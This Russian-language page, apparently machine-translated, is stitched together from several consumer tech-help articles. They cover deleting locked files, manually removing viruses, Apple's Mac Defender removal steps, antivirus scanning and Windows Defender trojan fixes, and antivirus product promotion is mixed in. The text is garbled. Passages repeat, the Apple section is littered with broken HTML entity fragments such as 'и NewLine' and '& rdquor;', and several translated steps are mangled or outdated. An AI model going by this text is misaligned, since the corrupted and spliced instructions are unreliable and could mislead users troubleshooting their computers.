Не закрывая окно, попробуйте удалить файл еще раз. По завершении вы можете установить исходные параметры конфигурации или отключить опцию индексации.

Использовать MoveOnBoot

MoveOnBoot — это простая бесплатная утилита, которая позволит вам удалять файлы, которые вы хотите удалить, до того, как ваша компьютерная система заблокирует их.Еще до запуска вашей системы изменения вносятся в ваш жесткий диск.

Вы можете скачать программное обеспечение здесь. После установки запустите программу и найдите файл, который вы хотите удалить.

Выберите опцию Удалить и нажмите ОК . Перезагрузите вашу систему в любое время, чтобы изменения вступили в силу.
Фото: Unsplash

Как удалить файлы, которые нельзя удалить

Последнее обновление 23 июня 2020 г., 09:24 Автор: Дэвид Уэбб .

Одна из наиболее распространенных проблем, возникающих при попытке очистить вашу систему, — это нежелание файла быть удаленным. Это может быть вызвано рядом факторов, включая ограничения файлов или папок, несовместимость системы, компьютерный вирус или доступ третьих лиц к файлу на общем компьютере. Если вы не можете окончательно удалить файл на своем компьютере, вот несколько вещей, на которые следует обратить внимание.

Удаление файла, который не удаляется

Убедитесь, что файл или папка не используются

Если вы используете общий компьютер, другой пользователь или программа может использовать файл / папку, которые вы пытаетесь удалить.

Попросите других пользователей закрыть свои активные программы и выйти из своей учетной записи. Затем вам следует перезагрузить компьютер , войти в свою учетную запись и снова попытаться удалить файл / папку.

Запустите вашу систему в безопасном режиме

Если ваша система или файл были заражены вирусом, использование Safe Mode может позволить вам удалить устойчивый файл, так как большинство вирусов активируются при работе в нормальном режиме .

Перезапустите вашу систему. Когда откроется первый экран, нажмите клавишу F8 на клавиатуре.

На экране будут перечислены различные варианты загрузки вашей системы. Используя стрелки на клавиатуре, выберите Safe Mode .

По завершении загрузки выберите файл / папку, которые необходимо удалить. Щелкните правой кнопкой мыши в файле и выберите опцию Удалить .

N.B. Не забудьте очистить корзину , щелкнув правой кнопкой мыши значок и выбрав опцию «Очистить корзину».

Загрузите или обновите антивирусную программу

Если ваша компьютерная система заражена, вы должны сначала загрузить антивирус , если у вас его еще нет. Если да, подумайте об обновлении текущей версии программного обеспечения и снова запустите процесс сканирования. Вот несколько советов по созданию хороших антивирусных программ:

BitDefender

BitDefender — это антивирусная и антишпионская программа, защищающая от фишинговых атак. Эта программа доступна как для коммерческого, так и для бесплатного пробного использования.Системные требования для BitDefender включают:

Windows 2000 с пакетом обновления 4

Windows XP с пакетом обновления 2 (32/64 бит)

Windows Vista (32/64 бит)

Касперский 7

Kaspersky 7 — это антивирусная и антишпионская программа, защищающая от червей и троянов. Эта программа имеет ряд системных и аппаратных требований, в том числе:

Microsoft Windows XP Professional x64, Microsoft Windows 2000 Professional (Service Pack 4 или выше), Microsoft Windows XP Professional (Service Pack 2 или выше), Microsoft Windows XP Home Edition (Service Pack 2 или выше), Microsoft Windows Vista, Microsoft Windows Vista x64.

50 МБ на жестком диске, проигрыватель компакт-дисков, подключение к Интернету, Internet Explorer 5.5 или выше, установщик Microsoft Windows 2.0.

Антивирус AVG 8

Anti-Virus 8 — это бесплатная антивирусная программа, совместимая с различными системами Windows, включая Windows 2000, Windows XP, Windows XP Pro x64, Windows Vista и Windows Vista x64.

Системные требования включают процессор Intel Pentium (300 МГц), 30 МБ на жестком диске, а также 256 МБ оперативной памяти.

Используйте блокнот

Вы можете попробовать использовать Блокнот, чтобы открыть файл, который вы хотите удалить, и обойти проводник Windows и его индексирование .

Откройте Блокнот и перейдите к Файл > Откройте .

Убедитесь, что для параметра Тип файла установлено значение Все файлы , а не только текстовые документы. После того, как вы найдете файл, который хотите удалить, щелкните правой кнопкой мыши и выберите Удалить . Не щелкайте файл дважды.

Не забудьте очистить корзину после завершения этого процесса.

Отключить службу индексирования

Нажмите кнопку Start и выберите Control Panel .Выберите Administrative Tools и перейдите на вкладку Services .

Найдите опцию Indexing , расположенную в нижней части окна. Нажмите кнопку Stop .

Не закрывая окно, попробуйте удалить файл еще раз. По завершении вы можете установить исходные параметры конфигурации или отключить опцию индексации.

Использовать MoveOnBoot

MoveOnBoot — это простая бесплатная утилита, которая позволит вам удалять файлы, которые вы хотите удалить, до того, как ваша компьютерная система заблокирует их.Еще до запуска вашей системы изменения вносятся в ваш жесткий диск.

Вы можете скачать программное обеспечение здесь. После установки запустите программу и найдите файл, который вы хотите удалить.

Выберите опцию Удалить и нажмите ОК . Перезагрузите вашу систему в любое время, чтобы изменения вступили в силу.
Фото: Unsplash

Как удалить самый худший компьютерный вирус

Tech Talker: быстрые и грязные советы по навигации в цифровом мире

Реклама

Scientific American представляет Tech Talker от Quick & Dirty Tips. Scientific American и Quick & Dirty Tips являются компаниями Macmillan.

За последние несколько месяцев я получил большое количество вопросов, связанных с вирусами и вредоносным ПО. Поэтому я решил сделать более сложную серию о восстановлении компьютера и борьбе с вирусами. Некоторые из стратегий, которые я упомянул в этом эпизоде, могут быть выше вашего уровня технического комфорта, но всегда полезно иметь практическое представление о том, что делать в случае, если ваш компьютер заражен неприятным вредоносным ПО.

Если вы еще не читали или не слушали мои эпизоды «Анатомия вируса» и «Как легко удалить компьютерные вирусы , », перейдите по ссылкам на эти эпизоды на веб-сайте «Быстрых и грязных советов». Это эпизоды 11 и 12 соответственно.

Просто чтобы обновить, что такое вредоносное ПО? Вредоносное ПО — это неприятная искусственная компьютерная ошибка, которая либо захватывает ваш компьютер, чтобы использовать его в гнусных целях, либо захватывает ваш компьютер и удерживает его в заложниках, пока вы не «заплатите» создателям вредоносного ПО, чтобы они удалили его за вас.В обеих этих ситуациях вы теряете контроль над своим компьютером.

Заражение вредоносным ПО может варьироваться от просто раздражающей программы рассылки спама до полномасштабной блокировки всех элементов управления вашего компьютера. Я уже обсуждал несколько простых способов удаления простых инфекций в предыдущем эпизоде. Однако тема сегодняшнего выпуска — это полномасштабная инфекция. Полное заражение — это когда ваш компьютер полностью неработоспособен, потому что вредоносная программа заблокировала клавиатуру или помешала вам запустить какие-либо приложения.Эти вирусы, как правило, не излечиваются одним антивирусным ПО, и на самом деле они могут быть вызваны более чем одним заражением. Вы будете хорошо осведомлены об этом виде инфекции, потому что не сможете использовать свой компьютер.

> Продолжить чтение на QuickAndDirtyTips.com

ОБ АВТОРЕ (-И)

Tech Talker Эрик Эскобар

Эрик Эскобар — профессиональный компьютерный хакер и ведущий подкаста Tech Talker на тему «Быстрые и грязные советы».

Прочитать дальше

Информационный бюллетень

Станьте умнее. Подпишитесь на нашу новостную е-мэйл рассылку.

Поддержите научную журналистику

Откройте для себя науку, меняющую мир. Изучите наш цифровой архив 1845 года, в который входят статьи более 150 лауреатов Нобелевской премии.

Подпишитесь сейчас!

Можно ли удалить компьютерный вирус без антивирусной программы?

Не нужно быть компьютерным гением, чтобы удалить вирус без помощи лучшего антивирусного программного обеспечения, но оно помогает.Антивирусные программы часто входят в стандартную комплектацию при покупке любого из новейших домашних компьютеров, поэтому с самого начала у вас должна быть какая-то защита. Но это дополнительные расходы, и многие люди в какой-то момент допускают прекращение работы своего антивируса. Это подвергает вас риску заражения вредоносным компьютерным вирусом.

Лучший способ решить эту проблему — повторно подписаться на какое-либо программное обеспечение для обеспечения безопасности в Интернете и просканировать / удалить жесткий диск вашего компьютера на предмет вторжений и вредоносных программ. Обычно это помогает. Однако, если вы в некоторой степени технически подкованы и действительно не хотите платить, вы можете попробовать несколько вещей, прежде чем выбрать премиальную антивирусную защиту.

Почему так сложно удалить вирус без программного обеспечения?

Хакер, а иногда и группа хакеров, которые создают компьютерные вредоносные программы, имеют по крайней мере одну общую цель. Это сделано для того, чтобы как можно более сложно удалить созданный ими вирус с вашего компьютера. Некоторые хакеры очень умны и проводят бесчисленные часы мозгового штурма, чтобы скрыть поврежденные файлы по всему вашему компьютеру, что делает удаление чрезвычайно трудным. В общем, вы не можете просто использовать инструмент Windows «Добавить / удалить программное обеспечение», чтобы избавиться от большинства вирусов сегодня.Отображаемые значки вируса могут исчезнуть, но вирус по-прежнему будет работать, скрыт в фоновом режиме на вашем компьютере и продолжит сеять хаос в вашей системе.

Чтобы удалить вирус без программного обеспечения, вам, скорее всего, потребуется выполнить поиск в Интернете и загрузить длинный список инструкций. Вам нужно будет знать свой компьютер от и до, и у вас будет достаточно времени, чтобы посвятить его ручному удалению вируса. Однако, если вирус, поражающий ваш компьютер, не так уж и вредоносен при относительном сравнении, несколько общих быстрых шагов, перечисленных ниже, могут помочь или не сработать.

(Изображение предоставлено Shutterstock)

Некоторые быстрые шаги, чтобы попытаться удалить вирус …

1. Удерживайте одновременно нажатыми кнопки CTRL, ALT и DEL — это запустит диспетчер задач Windows. После запуска диспетчера задач щелкните вкладку «Процессы». Просмотрите каждый процесс, то есть программу, которая в данный момент обрабатывает информацию на вашем компьютере. Если вы видите что-то незнакомое, поищите имя файла в Интернете и посмотрите, не связано ли оно с какими-либо вирусами.Если вы уверены, что определенный файл поврежден, нажмите кнопку «Завершить процесс» для этого файла.
2. Запустите утилиту настройки системы и щелкните вкладку «Запуск». В нем перечислены все программы, которые автоматически запускаются после загрузки вашего компьютера. Большинство вирусов запускаются при каждой загрузке операционной системы, поэтому снова поищите в этом списке какие-либо странные или неизвестные программы. Если вы видите программу с верным красным флажком, удалите ее из этого списка.
3. Щелкните меню «Пуск» и перейдите в служебную программу жесткого диска.Удаляйте вирусные файлы прямо с жесткого диска. Это может или не может удалить вирус полностью.

Простое удаление вируса с помощью программного обеспечения

Если у вас очень опасный вирус, удаление его вручную займет у вас много времени. Если вы не особо разбираетесь в технологиях, попытка удалить вирус вручную может оказаться пустой тратой времени, если вы не добьетесь успеха, и при этом у вас будет головная боль.

Лучшие антивирусные пакеты имеют высокий уровень успеха, когда дело доходит до удаления многих типов уже существующих инфекций на вашем компьютере.Лучшие пакеты также могут защитить вас почти от 100% будущих угроз. Поскольку это программное обеспечение стоит всего от 30 до 60 долларов, многие пользователи считают, что использование антивирусного программного обеспечения для удаления вируса — безусловно, лучшее решение. Ознакомьтесь с последними ценами на наши лучшие AV-пакеты ниже.

Лучшие на сегодняшний день Norton AntiVirus Plus, Kaspersky Anti-Virus и Bitdefender Antivirus Plus предлагает

Как избежать или удалить вредоносное ПО Mac Defender в Mac OS X v10.6 или более ранней версии

Узнайте, как избежать или удалить вредоносное ПО Mac Defender в Mac OS X v10.6 или более ранней версии.

Фишинг-мошенничество нацелено на пользователей Mac, перенаправляя их с законных веб-сайтов на поддельные веб-сайты, которые сообщают им, что их компьютер заражен вирусом. Затем пользователю предлагается «антивирусное» программное обеспечение Mac Defender для решения проблемы.
и NewLine;
& NewLine; Этот «антивирус» & rdquor; программное обеспечение является вредоносным, т. е. вредоносное ПО & rpar ;. Его конечная цель — получить информацию о кредитной карте пользователя, которая может быть использована в мошеннических целях.
и NewLine;
& NewLine; Наиболее распространенные названия этой вредоносной программы — MacDefender, MacProtector и MacSecurity.

Apple выпустила бесплатное обновление программного обеспечения & lpar; Security Update 2011-003 & rpar; который автоматически найдет и удалит вредоносное ПО Mac Defender и его известные варианты.
и NewLine;
& NewLine; В разделе «Решение» ниже также приведены пошаговые инструкции о том, как избежать или вручную удалить эту вредоносную программу.

Разрешение

Как избежать установки этой вредоносной программы

Если появятся какие-либо уведомления о вирусах или программном обеспечении безопасности, закройте Safari или любой другой браузер, который вы используете. Если обычная попытка закрыть браузер не работает, то принудительно закройте браузер.

В некоторых случаях ваш браузер может автоматически загрузить и запустить программу установки для этого вредоносного программного обеспечения. В этом случае отмените процесс установки & semi; не вводите пароль администратора. Немедленно удалите установщик, выполнив следующие действия.

и NewLine;
1. Перейдите в папку «Загрузки» или в желаемое место загрузки.
и NewLine;
2. Перетащите программу установки в корзину.
и NewLine;
3. Очистите корзину.
и NewLine;

Как удалить эту вредоносную программу
& NewLine;

Если вредоносная программа была установлена, мы рекомендуем следующие действия:

& NewLine;
• Ни при каких обстоятельствах не предоставляйте информацию о своей кредитной карте.
и NewLine;
• Используйте шаги по удалению, указанные ниже.
и NewLine;

Этапы удаления

& NewLine;
1. Переместите или закройте окно сканирования.
и NewLine;
2. Перейдите в папку «Утилиты» в папке «Приложения» и запустите Activity Monitor.
и NewLine;
3. Выберите «Все процессы» во всплывающем меню в правом верхнем углу окна.
и NewLine;
4. В столбце «Имя процесса» найдите имя приложения и щелкните его, чтобы выбрать & semi; общие названия приложений включают: MacDefender, MacSecurity или MacProtector.
и NewLine;
5. Нажмите кнопку «Выйти из процесса» в верхнем левом углу окна и выберите «Выйти».
и NewLine;
6. Закройте приложение Activity Monitor.
и NewLine;
7. Откройте папку «Приложения».
и NewLine;
8. Найдите приложение ex. MacDefender, MacSecurity, MacProtector или другое имя.
и NewLine;
9. Перетащите в корзину и очистите корзину.
и NewLine;

Вредоносное ПО также устанавливает элемент входа в вашу учетную запись в Системных настройках.Удаление элемента входа в систему не обязательно, но вы можете удалить его, выполнив следующие действия.

и NewLine;
• Откройте «Системные настройки», выберите «Учетные записи», затем «Элементы входа в систему».
& NewLine;
• Выберите имя приложения, которое вы удалили в шагах выше, например. MacDefender, MacSecurity, MacProtector
и NewLine;
• Нажмите кнопку «минус»
& NewLine;

Выполните действия, описанные в разделе «Как избежать установки этого вредоносного ПО & rdquor; раздел выше, чтобы удалить установщик из места загрузки.

Примечание. Apple предоставляет обновления безопасности для Mac исключительно через Центр обновления программного обеспечения и сайт поддержки Apple для загрузки. Пользователь должен проявлять осторожность всякий раз, когда его просят ввести конфиденциальную личную информацию в Интернете.
и NewLine;

Информация о продуктах, произведенных не Apple, или о независимых веб-сайтах, не контролируемых и не проверенных Apple, предоставляется без рекомендаций или одобрения.Apple не несет ответственности за выбор, работу или использование сторонних веб-сайтов или продуктов. Apple не делает никаких заявлений относительно точности или надежности сторонних веб-сайтов. Свяжитесь с продавцом для получения дополнительной информации.

Дата публикации: 8 декабря 2020 г.

Удалит ли антивирусное программное обеспечение существующие вирусы?

Итак, вы наконец определились с антивирусным программным обеспечением, которое хотите установить, и чувствуете себя неплохо, зная, что ваши данные будут защищены от вредоносных программ.Вдруг у вас в голове возникает вопрос; что будет, если у меня уже есть вирус. Удалит ли мое антивирусное программное обеспечение существующие вирусы? Ответ — «да», но есть одно предостережение; чтобы удалить их, вам нужно будет предпринять некоторые действия самостоятельно. Вот что вам нужно сделать:

Просканируйте вашу систему
Сначала запустите полное антивирусное сканирование системы на вашем компьютере. Полное сканирование системы проверяет все файлы в вашей системе. При обнаружении вредоносного ПО ваше антивирусное программное обеспечение спросит вас, поместить ли вирус в карантин или удалить его навсегда.Любой из вариантов является эффективным методом удаления вируса. Однако перед запуском сканирования убедитесь, что у вас установлена ​​последняя версия антивирусного программного обеспечения. Поскольку при сканировании для обнаружения вирусов используется база данных сигнатур известных вирусов, ваш антивирус должен всегда работать с актуальной базой сигнатур. Сканеры сравнивают уникальную сигнатуру каждого файла на вашем компьютере с вирусными сигнатурами в вирусной базе данных. Совпадение означает, что вирус был обнаружен, но если у вас устаревшее программное обеспечение, оно не сможет использовать новейшую базу данных и, следовательно, не сможет обнаруживать новые вирусы.Следовательно, вы не сможете полностью защитить себя от известных вредоносных программ, если у вас не будет последняя версия программного обеспечения.

Что произойдет, если я не могу загрузить свою систему для запуска сканирования?
Если вы не можете загрузиться в Windows, вам придется загрузиться в безопасном режиме и запустить оттуда полное сканирование системы. В зависимости от размера вашего жесткого диска и количества файлов в вашей системе этот процесс может занять некоторое время, но убедитесь, что сканирование выполняется до его завершения. Как объяснялось выше, когда оно будет завершено, ваше антивирусное программное обеспечение спросит вас, как вы хотите бороться с любым обнаруженным вредоносным ПО (например,g., удалить навсегда или поместить в карантин).

Что будет дальше?
После того, как антивирусное программное обеспечение успешно удалило вредоносное ПО, выключите компьютер, перезагрузите его и снова запустите полное сканирование. Будем надеяться, что во второй раз у вас не будет вредоносных программ и все будет в порядке, но если нет, вам придется повторить процесс, описанный выше.

Профилактика — лучшее противоядие
Хотя хорошо знать, что вы можете удалить существующие вирусы, лучший способ сохранить ваши данные в безопасности — это в первую очередь предотвратить заражение вашей системы вредоносными программами.И лучший способ сделать это — установить антивирусное программное обеспечение и всегда поддерживать его в актуальном состоянии.

Защитник Windows не может удалить троянские угрозы

Кроме того, он позволяет защите в реальном времени сканировать все ваши приложения и программы при запуске, чтобы гарантировать их безопасность.

Функция защиты от программ-вымогателей блокирует любые типы эксплойтов до того, как они будут запущены на вашем устройстве.

В целом, Vipre предлагает полную защиту от самых продвинутых угроз, и он определенно обнаружит трояны в вашей системе и сразу же устранит их.

Антивирус Vipre Plus

Это ваш лучший шанс избавиться от троянов и любых других вредоносных программ, которые могут привести к сбою вашего устройства.

2. Запустите сканирование на вирусы с помощью сканера безопасности Microsoft

Microsoft Safety Scanner — это бесплатное загружаемое средство безопасности для сканирования по требованию, которое помогает удалять вредоносные программы, а также работает с существующим антивирусным программным обеспечением.

Однако он истекает через 10 дней после его загрузки, поэтому, чтобы повторно запустить сканирование с последними определениями защиты от вредоносных программ, загрузите и установите его снова.

Если вы запустите проверку на вирусы, не переустанавливая Microsoft Safety Scanner, программа будет удалена, как и все зараженные файлы и папки.

---

3. Выполните чистую загрузку

1. Войдите в систему как администратор и введите msconfig в поле поиска.
2. Выберите Конфигурация системы.
3. Найдите Services tab.
4. Выберите Скрыть поле для всех служб Microsoft.
5. Нажмите Отключить все.
6. Перейдите на вкладку Запуск .
7. Нажмите Открыть диспетчер задач.
8. Закройте диспетчер задач, затем нажмите ОК.
9. Перезагрузите компьютер.

---

4. Измените запуск службы Защитника Windows на автоматический

1. Щелкните правой кнопкой мыши «Пуск» и выберите « Выполнить».
2. Введите services.msc и нажмите клавишу ВВОД.
3. Щелкните правой кнопкой мыши службу Защитник Windows .
4. Щелкните «Свойства «.
5. Убедитесь, что Service Status работает.
6. Убедитесь, что Тип запуска — Автоматический.
7. Нажмите Применить , затем нажмите ОК и перезагрузите компьютер.

---

5. Очистите временный файл / кэш

1. Откройте Internet Explorer.
2. Щелкните «Инструменты ».
3. Щелкните Свойства обозревателя.
4. Выберите вкладку Общие .
5. Щелкните История просмотров.
6. Выберите Удалить.
7. Снимите флажок. Сохранить данные избранных веб-сайтов.
8. Удалите временные файлы, удалите куки, историю, пароли и т. Д.

Чтобы убедиться, что ваши файлы cookie были удалены, выполните следующие действия:

1. Щелкните Start и введите inetcpl. cpl в поле поиска и нажмите Enter.
2. В диалоговом окне Свойства Интернета перейдите на вкладку Общие .
3. Щелкните Настройки под История просмотра.
4. В настройках «Временные файлы Интернета и история » щелкните Просмотр файлов , чтобы открыть папку, в которой хранятся файлы cookie.
5. В открытой папке нажмите CTRL + A, CTRL + D , затем нажмите Enter, чтобы удалить файлы cookie.
6. Закройте и перезагрузите компьютер.
7. Просканируйте компьютер с помощью Vipre , как рекомендовано в первом решении (или доступен другой антивирусный инструмент).

---

6. Запустить полную проверку в безопасном режиме

1. Щелкните Start и выберите Settings.
2. Щелкните Обновление и безопасность.
3. Выберите Recovery на левой панели.
4. Перейдите к Расширенный запуск.
5. Нажмите Перезагрузить сейчас.
6. Выберите Устранение неполадок из выберите экран параметров , затем щелкните Дополнительные параметры.
7. Перейдите к Параметры запуска и нажмите Перезагрузить.
8. После перезагрузки компьютера появится список параметров.
9. Выберите 4 или F4 , чтобы запустить компьютер в безопасном режиме.
10. Запустите полное сканирование с помощью другого антивирусного программного обеспечения.

Помогло ли какое-либо из этих решений исправить то, что Защитник Windows не удаляет троянские угрозы? Дайте нам знать в комментариях ниже.